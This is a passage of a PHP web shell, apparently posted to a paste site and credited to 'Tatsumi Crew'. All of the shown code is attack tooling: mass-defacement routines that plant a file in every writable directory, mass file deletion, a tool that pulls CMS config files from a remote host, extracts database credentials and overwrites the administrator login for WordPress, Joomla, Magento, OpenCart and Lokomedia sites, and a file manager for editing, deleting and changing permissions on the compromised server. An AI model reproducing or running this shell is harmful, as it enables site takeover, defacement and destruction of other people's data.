  1526. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1527. if(is_dir($dirrall . "/" . $file)) {
  1528. $inner_files = ListFiles($dirrall . "/" . $file);
  1529. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1530. } else {
  1531. array_push($files, $dirrall . "/" . $file);
  1532. }
  1533. }
  1534. }
  1535.  
  1536. closedir($dh);
  1537. return $files;
  1538. }
  1539. }
  1540. function gass_all(){
  1541. global $index ;
  1542. $dirrall=$_POST['d_dir'];
  1543. foreach (ListFiles($dirrall) as $key=>$file){
  1544. $file = str_replace('//',"/",$file);
  1545. echo "<center><strong>$file</strong> ===>";
  1546. edit_file($file,$index);
  1547. flush();
  1548. }
  1549. $key = $key+1;
  1550. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  1551. function sabun_massal($dir,$namafile,$isi_script) {
  1552. if(is_writable($dir)) {
  1553. $dira = scandir($dir);
  1554. foreach($dira as $dirb) {
  1555. $dirc = "$dir/$dirb";
  1556. $lokasi = $dirc.'/'.$namafile;
  1557. if($dirb === '.') {
  1558. file_put_contents($lokasi, $isi_script);
  1559. } elseif($dirb === '..') {
  1560. file_put_contents($lokasi, $isi_script);
  1561. } else {
  1562. if(is_dir($dirc)) {
  1563. if(is_writable($dirc)) {
  1564. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1565. file_put_contents($lokasi, $isi_script);
  1566. $idx = sabun_massal($dirc,$namafile,$isi_script);
  1567. }
  1568. }
  1569. }
  1570. }
  1571. }
  1572. }
  1573. if($_POST['mass'] == 'onedir') {
  1574. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1575. $ini="http://";
  1576. $mainpath=$_POST[d_dir];
  1577. $file=$_POST[d_file];
  1578. $path=opendir("$mainpath");
  1579. $code=base64_encode($_POST[script]);
  1580. $indx=base64_decode($code);
  1581. while($row=readdir($dir)){
  1582. $start=@fopen("$row/$file","w+");
  1583. $finish=@fwrite($start,$indx);
  1584. if ($finish){
  1585. echo"$ini$row/$file\n";
  1586. }
  1587. }
  1588. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1589. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1590. $path=opendir("$mainpath");
  1591. $code=base64_encode($_POST[script]);
  1592. $indx=base64_decode($code);
  1593. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1594. $finish=@fwrite($start,$indx);
  1595. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1596. }
  1597.  
  1598. }
  1599. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1600. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1601. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1602. elseif($_POST['mass'] == 'massdeface') {
  1603. echo "<div style='margin: 5px auto; padding: 5px'>";
  1604. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1605. echo "</div>"; }
  1606. else {
  1607. echo "
  1608. <center><font style='text-decoration: underline;'>
  1609. Select Type:<br>
  1610. </font>
  1611. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  1612. <option value=\"onedir\">Mass Deface 1 Dir</option>
  1613. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1614. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1615. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1616. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1617. <font style='text-decoration: underline;'>Folder:</font><br>
  1618. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1619. <font style='text-decoration: underline;'>Filename:</font><br>
  1620. <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
  1621. <font style='text-decoration: underline;'>Index File:</font><br>
  1622. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./Cyber00t</textarea><br>
  1623. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1624. </form></center>";
  1625. }
  1626. }elseif($_GET['mass'] == 'changer') {
  1627. if($_POST['sikat']) {
  1628. echo "<center><h1>Config Reset Password</h1>
  1629. <form method='post'>
  1630. Link Config: <br>
  1631. <textarea name='link' style='width: 450px; height:250px;'>";
  1632. GrabUrl($_POST['linkconfig'],'txt');
  1633. echo"</textarea><br>
  1634. User Baru : <input type='text' name='newuser' placeholder='tatsumi'> <br><br>
  1635. Password Baru : <input type='text' name='newpasswd' placeholder='tatsumi'><br><br>
  1636. <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
  1637. </form></center>";
  1638. }else {
  1639. echo '<center>
  1640. <h1>Config Reset Password</h1>
  1641. <form method="post">
  1642. </select><br>
  1643. Link Config :<br>
  1644. <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/tatsumi_symconf/"><br>
  1645. </br>
  1646. <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
  1647. </form></center>';
  1648. }
  1649. if($_POST['masschanger']) {
  1650. $user = $_POST['newuser'];
  1651. $pass = $_POST['newpasswd'];
  1652. $passx = md5($pass);
  1653. $link = explode("\r\n", $_POST['link']);
  1654. foreach($link as $file_conf) {
  1655. $config = file_get_contents($file_conf);
  1656. if(preg_match("/JConfig|joomla/",$config)) {
  1657. $dbhost = ambilkata($config,"host = '","'");
  1658. $dbuser = ambilkata($config,"user = '","'");
  1659. $dbpass = ambilkata($config,"password = '","'");
  1660. $dbname = ambilkata($config,"db = '","'");
  1661. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1662. $prefix = $dbprefix."users";
  1663. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1664. $db = mysql_select_db($dbname);
  1665. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1666. $result = mysql_fetch_array($q);
  1667. $id = $result['id'];
  1668. $site = ambilkata($config,"sitename = '","'");
  1669. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1670. echo "CMS: Joomla<br>";
  1671. if($site == '') {
  1672. echo "Sitename => <font color=red>Error Cok</font><br>";
  1673. } else {
  1674. echo "Sitename => $site<br>";
  1675. }
  1676. if(!$update OR !$conn OR !$db) {
  1677. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1678. } else {
  1679. echo "[+] username: <font color=lime>$user</font><br>";
  1680. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1681. }
  1682. mysql_close($conn);
  1683. } elseif(preg_match("/WordPress/",$config)) {
  1684. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1685. $dbuser = ambilkata($config,"DB_USER', '","'");
  1686. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1687. $dbname = ambilkata($config,"DB_NAME', '","'");
  1688. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1689. $prefix = $dbprefix."users";
  1690. $option = $dbprefix."options";
  1691. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1692. $db = mysql_select_db($dbname);
  1693. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1694. $result = mysql_fetch_array($q);
  1695. $id = $result[ID];
  1696. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1697. $result2 = mysql_fetch_array($q2);
  1698. $target = $result2[option_value];
  1699. if($target == '') {
  1700. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1701. } else {
  1702. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1703. }
  1704. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1705. echo "CMS: Wordpress<br>";
  1706. echo $url_target;
  1707. if(!$update OR !$conn OR !$db) {
  1708. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1709. } else {
  1710. echo "[+] username: <font color=lime>$user</font><br>";
  1711. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1712. }
  1713. mysql_close($conn);
  1714. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1715. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1716. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1717. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1718. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1719. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1720. $prefix = $dbprefix."admin_user";
  1721. $option = $dbprefix."core_config_data";
  1722. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1723. $db = mysql_select_db($dbname);
  1724. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1725. $result = mysql_fetch_array($q);
  1726. $id = $result[user_id];
  1727. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1728. $result2 = mysql_fetch_array($q2);
  1729. $target = $result2[value];
  1730. if($target == '') {
  1731. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1732. } else {
  1733. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1734. }
  1735. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1736. echo "CMS: Magento<br>";
  1737. echo $url_target;
  1738. if(!$update OR !$conn OR !$db) {
  1739. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1740. } else {
  1741. echo "[+] username: <font color=lime>$user</font><br>";
  1742. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1743. }
  1744. mysql_close($conn);
  1745. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1746. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1747. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1748. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1749. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1750. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1751. $prefix = $dbprefix."user";
  1752. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1753. $db = mysql_select_db($dbname);
  1754. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1755. $result = mysql_fetch_array($q);
  1756. $id = $result[user_id];
  1757. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1758. if($target == '') {
  1759. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1760. } else {
  1761. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1762. }
  1763. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1764. echo "CMS: OpenCart<br>";
  1765. echo $url_target;
  1766. if(!$update OR !$conn OR !$db) {
  1767. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1768. } else {
  1769. echo "[+] username: <font color=lime>$user</font><br>";
  1770. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1771. }
  1772. mysql_close($conn);
  1773. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1774. $dbhost = ambilkata($config,'server = "','"');
  1775. $dbuser = ambilkata($config,'username = "','"');
  1776. $dbpass = ambilkata($config,'password = "','"');
  1777. $dbname = ambilkata($config,'database = "','"');
  1778. $prefix = "users";
  1779. $option = "identitas";
  1780. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1781. $db = mysql_select_db($dbname);
  1782. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1783. $result = mysql_fetch_array($q);
  1784. $target = $result[alamat_website];
  1785. if($target == '') {
  1786. $target2 = $result[url];
  1787. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1788. if($target2 == '') {
  1789. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1790. } else {
  1791. $cek_login3 = file_get_contents("$target2/adminweb/");
  1792. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1793. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1794. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1795. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1796. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1797. } else {
  1798. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1799. }
  1800. }
  1801. } else {
  1802. $cek_login = file_get_contents("$target/adminweb/");
  1803. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1804. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1805. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1806. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1807. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1808. } else {
  1809. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1810. }
  1811. }
  1812. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1813. echo "CMS: Lokomedia<br>";
  1814. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1815. echo $url_target2;
  1816. } else {
  1817. echo $url_target;
  1818. }
  1819. if(!$update OR !$conn OR !$db) {
  1820. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1821. } else {
  1822. echo "[+] username: <font color=lime>$user</font><br>";
  1823. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1824. }
  1825. mysql_close($conn);
  1826. }
  1827. }
  1828. }
  1829. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  1830. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  1831. if($_POST['opt'] == 'chmod'){
  1832. if(isset($_POST['perm'])){
  1833. if(chmod($_POST['path'],$_POST['perm'])){
  1834. echo '<font color="green">Success !</font><br/>';
  1835. }else{
  1836. echo '<font color="red">Denied !</font><br />';
  1837. }
  1838. }
  1839. echo '<form method="POST">
  1840. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  1841. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1842. <input type="hidden" name="opt" value="chmod">
  1843. <input type="submit" value="Go" />
  1844. </form>';
  1845. }
  1846. elseif($_POST['opt'] == 'rename'){
  1847. if(isset($_POST['newname'])){
  1848. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  1849. echo '<font color="green">Success !</font><br/>';
  1850. }else{
  1851. echo '<font color="red">Denied !</font><br />';
  1852. }
  1853. $_POST['name'] = $_POST['newname'];
  1854. }
  1855. echo '<form method="POST">
  1856. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  1857. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1858. <input type="hidden" name="opt" value="rename">
  1859. <input type="submit" value="Go" />
  1860. </form>';
  1861. }elseif($_POST['opt'] == 'edit'){
  1862. if(isset($_POST['src'])){
  1863. $fp = fopen($_POST['path'],'w');
  1864. if(fwrite($fp,$_POST['src'])){
  1865. echo '<font color="green">Success !</font><br/>';
  1866. }else{
  1867. echo '<font color="red">Denied !</font><br/>';
  1868. }
  1869. fclose($fp);
  1870. }
  1871. echo '<form method="POST">
  1872. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  1873. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1874. <input type="hidden" name="opt" value="edit">
  1875. <input type="submit" value="Save" />
  1876. </form>';
  1877. }
  1878. echo '</center>';
  1879. }else{
  1880. echo '</table><br/><center>';
  1881. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  1882. if($_POST['type'] == 'dir'){
  1883. if(rmdir($_POST['path'])){
  1884. echo '<font color="green">Success !</font><br/>';
  1885. }else{
  1886. echo '<font color="red">Denied ! </font><br/>';
  1887. }
  1888. }elseif($_POST['type'] == 'file'){
  1889. if(unlink($_POST['path'])){
  1890. echo '<font color="green">Success</font><br/>';
  1891. }else{
  1892. echo '<font color="red">Denied</font><br/>';
  1893. }
  1894. }
  1895. }
  1896. echo '';
  1897. $scandir = scandir($path);
  1898. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1899. <tr>
  1900. <tr class="first">
  1901. <th class="th_home"><center>Name</center></th>
  1902. <th class="th_home"><center>Size</center></th>
  1903. <th class="th_home"><center>Permission</center></th>
  1904. <th class="th_home"><center>Action</center></th>
  1905. </tr>';
  1906.  
  1907. foreach($scandir as $dir){
  1908. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1909. echo '<tr>
  1910. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  1911. <td><center>--</center></td>
  1912. <td><center>';
  1913. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  1914. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  1915. echo perms($path.'/'.$dir);
  1916. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  1917.  
  1918. echo '</center></td>
  1919. <td><center><form method="POST" action="?option&path='.$path.'">
  1920. <select name="opt">
  1921. <option value="">Select</option>
  1922. <option value="delete">Delete</option>
  1923. <option value="chmod">Chmod</option>
  1924. <option value="rename">Rename</option>
  1925. </select>
  1926. <input type="hidden" name="type" value="dir">
  1927. <input type="hidden" name="name" value="'.$dir.'">
  1928. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  1929. <input type="submit" value=">">
  1930. </form></center></td>
  1931. </tr>';
  1932. }
  1933. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  1934. foreach($scandir as $file){
  1935. if(!is_file($path.'/'.$file)) continue;
  1936. $size = filesize($path.'/'.$file)/1024;
  1937. $size = round($size,3);
  1938. if($size >= 1024){
  1939. $size = round($size/1024,2).' MB';
  1940. }else{
  1941. $size = $size.' KB';
  1942. }
  1943.  
  1944. echo '<tr>
  1945. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  1946. <td><center>'.$size.'</center></td>
  1947. <td><center>';
  1948. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  1949. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1950. echo perms($path.'/'.$file);
  1951. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  1952. echo '</center></td>
  1953. <td><center><form method="POST" action="?option&path='.$path.'">
  1954. <select name="opt">
  1955. <option value="">Select</option>
  1956. <option value="delete">Delete</option>
  1957. <option value="chmod">Chmod</option>
  1958. <option value="rename">Rename</option>
  1959. <option value="edit">Edit</option>
  1960. </select>
  1961. <input type="hidden" name="type" value="file">
  1962. <input type="hidden" name="name" value="'.$file.'">
  1963. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  1964. <input type="submit" value=">">
  1965. </form></center></td>
  1966. </tr>';
  1967. }
  1968. echo '</table>
  1969. </div>';
  1970. }
  1971. echo '<br><br><hr color="#191919"><br><center><br/>koneksi eror shell by &copy '.date("Y").' <a href="http://www.tatsumi-crew.net" target="_blank">Tatsumi Crew</a></center>
  1972. </body>
  1973. </html>';
  1974. ?>
Add Comment
Please, Sign In to add comment